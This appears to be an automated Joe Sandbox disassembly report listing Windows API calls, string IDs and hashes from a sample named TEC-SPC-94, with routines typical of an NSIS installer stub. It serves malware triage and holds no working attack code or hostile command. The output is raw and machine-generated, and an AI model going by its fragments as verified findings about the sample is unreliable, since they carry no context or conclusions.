                                                          • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                          • GetClientRect.USER32(?,?), ref: 004053DC
                                                          • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                          • ShowWindow.USER32(?,00000008), ref: 00405480
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                            • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405508
                                                          • ShowWindow.USER32(00000000), ref: 0040552C
                                                          • ShowWindow.USER32(?,00000008), ref: 00405531
                                                          • ShowWindow.USER32(00000008), ref: 0040557B
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                          • CreatePopupMenu.USER32 ref: 004055C0
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                          • GetWindowRect.USER32(?,?), ref: 004055F4
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                          • OpenClipboard.USER32(00000000), ref: 00405655
                                                          • EmptyClipboard.USER32 ref: 0040565B
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                          • CloseClipboard.USER32 ref: 004056B6
                                                          Strings
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {$&B
                                                          • API String ID: 590372296-2518801558
                                                          • Opcode ID: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                          • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                          • Opcode Fuzzy Hash: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                          • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                          • ShowWindow.USER32(?), ref: 00403D1B
                                                          • DestroyWindow.USER32 ref: 00403D2F
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                          • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                          • EnableWindow.USER32(?,?), ref: 00403F83
                                                          • EnableWindow.USER32(?,?), ref: 00403F9E
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                          • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                          • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                          • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID: &B
                                                          • API String ID: 184305955-3208460036
                                                          • Opcode ID: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                          • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                          • Opcode Fuzzy Hash: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                          • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E
                                                          APIs
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,76233420,00000000,00434000), ref: 004039A0
                                                          • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
                                                          • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                          • GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A87
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                          • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                          • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                          Strings
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                          • API String ID: 914957316-1918744475
                                                          • Opcode ID: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                          • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                          • Opcode Fuzzy Hash: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                          • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                          • GetSysColor.USER32(?), ref: 00404417
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                          • lstrlenW.KERNEL32(?), ref: 00404438
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                          • SendMessageW.USER32(00000000), ref: 004044BA
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                          • SetCursor.USER32(00000000), ref: 00404539
                                                          • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                          • SetCursor.USER32(00000000), ref: 0040455D
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                          Strings
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: N$open
                                                          • API String ID: 3615053054-904208323
                                                          • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                          • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                          • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                          • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                                          APIs
                                                          • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                          • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                          • wsprintfA.USER32 ref: 00405CDE
                                                          • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          Strings
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                          • API String ID: 1265525490-899692902
                                                          • Opcode ID: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                          • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                          • Opcode Fuzzy Hash: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                          • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                          • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                          • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                          • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
                                                          • lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                            • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 0040623F
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406253
                                                            • Part of subcall function 004061DC: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406266
                                                          • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                          • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                          • String ID: A$&B
                                                          • API String ID: 2246997448-2586977930
                                                          • Opcode ID: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                          • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                          • Opcode Fuzzy Hash: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                          • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                          • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                          • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                          Strings
                                                          • Error launching installer, xrefs: 00402E0C
                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                          • Null, xrefs: 00402EB5
                                                          • Inst, xrefs: 00402EA3
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                          • soft, xrefs: 00402EAC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-787788815
                                                          • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                          • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
                                                          APIs
                                                          • GetVersion.KERNEL32(00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 0040602D
                                                          • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 004060AB
                                                          • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 004060BE
                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                          • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 00406108
                                                          • CoTaskMemFree.OLE32(?), ref: 00406113
                                                          • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                          • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 00406191
                                                          Strings
                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406131
                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406079
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 900638850-730719616
                                                          • Opcode ID: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                          • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                          • Opcode Fuzzy Hash: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                          • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                          • GetSysColor.USER32(00000000), ref: 0040423A
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                          • SetBkMode.GDI32(?,?), ref: 00404252
                                                          • GetSysColor.USER32(?), ref: 00404265
                                                          • SetBkColor.GDI32(?,?), ref: 00404275
                                                          • DeleteObject.GDI32(?), ref: 0040428F
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                            • Part of subcall function 00405C37: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                          • String ID: 9
                                                          • API String ID: 1149667376-2366072709
                                                          • Opcode ID: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                          • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                          • Opcode Fuzzy Hash: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                          • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                          • String ID:
                                                          • API String ID: 3294113728-0
                                                          • Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                          • Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
                                                          • Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                          • Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9
                                                          APIs
                                                          • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                          • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                          • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                          • SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
